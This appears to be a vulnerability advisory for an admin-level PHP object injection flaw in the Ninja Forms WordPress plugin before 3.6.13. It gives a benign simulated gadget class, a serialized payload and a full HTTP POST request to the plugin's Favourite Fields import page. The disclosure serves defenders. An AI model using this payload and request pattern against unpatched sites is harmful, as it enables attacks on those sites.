NinjaForms < 3.6.13 - Admin+ PHP Objection Injection

2022-09-0500:00:00

Alessio Santoru

225

ninjaforms

php objection injection

admin+

exploit

import/export

favourite fields

arbitrary deserialization

gadget chain

security vulnerability

EPSS

0.001

Percentile

42.9%

JSON

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then import a file with the following content via Import / Export > Favourite Fields (/wp-admin/admin.php?page=nf-import-export&tab=favorite_fields): O:4:"Evil":0:{};


POST /wp-admin/admin.php?page=nf-import-export&tab=favorite_fields HTTP/1.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKFuobGrwagXg1r1n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin+
Connection: close

------WebKitFormBoundaryKFuobGrwagXg1r1n
Content-Disposition: form-data; name="nf_import_fields"; filename="test"
Content-Type: application/octet-stream

O:4:"Evil":0:{};

------WebKitFormBoundaryKFuobGrwagXg1r1n
Content-Disposition: form-data; name="nf_import_security"

252edff6dd
------WebKitFormBoundaryKFuobGrwagXg1r1n--

EPSS

0.001

Percentile

42.9%

JSON

Related for WPEX-ID:255B98BA-5DA9-4424-A7E9-C438D8905864